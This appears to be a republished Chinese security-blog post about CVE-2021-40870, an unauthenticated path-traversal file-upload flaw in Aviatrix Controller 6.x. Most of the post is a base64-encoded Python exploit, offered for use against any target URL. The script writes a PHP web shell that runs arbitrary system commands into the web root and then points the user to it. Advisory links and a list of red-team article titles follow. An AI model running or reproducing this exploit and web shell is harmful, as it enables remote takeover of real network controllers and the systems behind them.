CVE-2021-40870 Aviatrix Controller RCE

        在 6.5-1804.1922 之前的 Aviatrix Controller 6.x ，可以不受限制地上传具有危险类型的文件，这允许未经身份验证的用户通过目录遍历执行任意代码。

要运行这个项目，你需要在你的 python 中添加以下模块

requests urllib3python3 poc.py https://site.com/

aW1wb3J0IHJlcXVlc3RzDQppbXBvcnQganNvbg0KaW1wb3J0IHN5cw0KaW1wb3J0IHRpbWUNCmZyb20gcmVxdWVzdHMucGFja2FnZXMgaW1wb3J0IHVybGxpYjMNCg0KdXJsbGliMy5kaXNhYmxlX3dhcm5pbmdzKHVybGxpYjMuZXhjZXB0aW9ucy5JbnNlY3VyZVJlcXVlc3RXYXJuaW5nKQ0KDQpiYW5uZXIgPSAmIzM5OyYjMzk7JiMzOTsNCiAgIF9fXyAgICAgICAgIF9fICAgIF9fX18gICBfX18gX19fXyAgXyAgICAgICBfICBfICAgIF9fXyAgIF9fXyBfX19fXyBfX18gIA0KICAvIF9fXC9cICAgL1wvX19cICB8X19fIFwgLyBfIFxfX18gXC8gfCAgICAgfCB8fCB8ICAvIF8gXCAoIF8gKV9fXyAgLyBfIFwgDQogLyAvICAgXCBcIC8gL19cX19fX18gX18pIHwgfCB8IHxfXykgfCB8X19fX198IHx8IHxffCB8IHwgfC8gXyBcICAvIC8gfCB8IHwNCi8gL19fXyAgXCBWIC8vX3xfX19fXy8gX18vfCB8X3wgLyBfXy98IHxfX19fX3xfXyAgIF98IHxffCB8IChfKSB8LyAvfCB8X3wgfA0KXF9fX18vICAgXF8vXF9fLyAgICB8X19fX198XF9fXy9fX19fX3xffCAgICAgICAgfF98ICBcX19fLyBcX19fLy9fLyAgXF9fXy8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgW2J5IDB4QWd1bl0NCiAgICAgICAgICAgICAgICAgICAgIFVzZSA6IHB5dGhvbjMgcG9jLnB5IGh0dHBzOi8vc2l0ZS5jb20vDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiYjMzk7JiMzOTsmIzM5Ow0KcHJpbnQoYmFubmVyKQ0KDQpiYXNlX3VybCA9IHN5cy5hcmd2WzFdDQp1c2VyID0gJiMzOTsmIzM5OyYjMzk7TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzcwLjAuMzUzOC43NyBTYWZhcmkvNTM3LjM2JiMzOTsmIzM5OyYjMzk7DQpmaWxlbmFtZSA9ICJSQ0UucGhwIg0Kc2hlbGwgPSAmIzM5OyYjMzk7JiMzOTsmbHQ7P3BocCBpZihpc3NldCgkX1JFUVVFU1RbJiMzOTtjbWQmIzM5O10pKXsgZWNobyAiJmx0O3ByZSZndDsiOyAkY21kID0gKCRfUkVRVUVTVFsmIzM5O2NtZCYjMzk7XSk7IHN5c3RlbSgkY21kKTsgZWNobyAiJmx0Oy9wcmUmZ3Q7IjsgZGllOyB9PyZndDsmIzM5OyYjMzk7JiMzOTsNCmlmIGJhc2VfdXJsLnN0YXJ0c3dpdGgoJiMzOTtodHRwczovLyYjMzk7KToNCiAgICBrID0gYmFzZV91cmwucmVwbGFjZSgiaHR0cHM6Ly8iLCAiIikNCiAgICBpZiBrLmVuZHN3aXRoKCIvIik6DQogICAgICAgIHAgPSBrLnJlcGxhY2UoIi8iLCAiIikNCg0KaGVhZGVycyA9IHsNCiAgICAiSG9zdCI6IHAsDQogICAgIlVzZXItQWdlbnQiOiB1c2VyLA0KICAgICJDb25uZWN0aW9uIjogImNsb3NlIiwNCiAgICAiQ29udGVudC1MZW5ndGgiOiAiMTA5IiwNCiAgICAiQ29udGVudC1UeXBlIjogImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIsDQogICAgIkFjY2VwdC1FbmNvZGluZyI6ICJnemlwIiwNCg0KfQ0KDQpib2R5ID0gZiYjMzk7Q0lEPXgmYWN0aW9uPXNldF9tZXRyaWNfZ3dfc2VsZWN0aW9ucyZhY2NvdW50X25hbWU9Ly4uLy4uLy4uL3Zhci93d3cvcGhwL3tmaWxlbmFtZX0mZGF0YT1wb2MgYnkgYWd1bntzaGVsbH0mIzM5Ow0KDQoNCnIgPSByZXF1ZXN0cy5wb3N0KGJhc2VfdXJsKyYjMzk7L3YxL2JhY2tlbmQxJiMzOTssIGhlYWRlcnM9aGVhZGVycywgZGF0YT1ib2R5LCB2ZXJpZnk9RmFsc2UpDQoNCmNoZWNrX2ZpbGUgPSByZXF1ZXN0cy5nZXQoYmFzZV91cmwrJiMzOTsvdjEvJiMzOTsrZmlsZW5hbWUsIHZlcmlmeT1GYWxzZSkNCmlmIGNoZWNrX2ZpbGUuc3RhdHVzX2NvZGUgPT0gMjAwOg0KICAgIHByaW50KGYmIzM5O0VYUExPSVRFRCB7YmFzZV91cmx9JiMzOTspDQogICAgcHJpbnQoJiMzOTsmIzM5OykNCiAgICBwcmludChmJiMzOTtHbyBUbyB7YmFzZV91cmx9L3YxL3tmaWxlbmFtZX0mIzM5OykNCiAgICBwcmludCgmIzM5OyYjMzk7KQ0KICAgIHByaW50KCYjMzk7YWNjZXNzIHNoZWxsIHVzaW5nIFJDRS5waHA/Y21kPVtjb21tYW5kXSYjMzk7KQ0KZWxzZToNCiAgICBwcmludCgiU29ycnkgRHVkZSBCYWQgbHVjayIp

• http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html

• https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021

• https://wearetradecraft.com/advisories/tc-2021-0002/

------------------------------------------------------------------------------

往期回顾：

红队笔记 - PowerShell AMSI Bypass

红队笔记 - PowerView进行AD列举

红队笔记 - 横向移动

红队笔记 - 提权&权限维持

红队笔记 - 域渗透攻击

红队笔记 - 后渗透

红队笔记 - 后渗透2

原文始发于微信公众号（Khan安全攻防实验室）：CVE-2021-40870 Aviatrix Controller RCE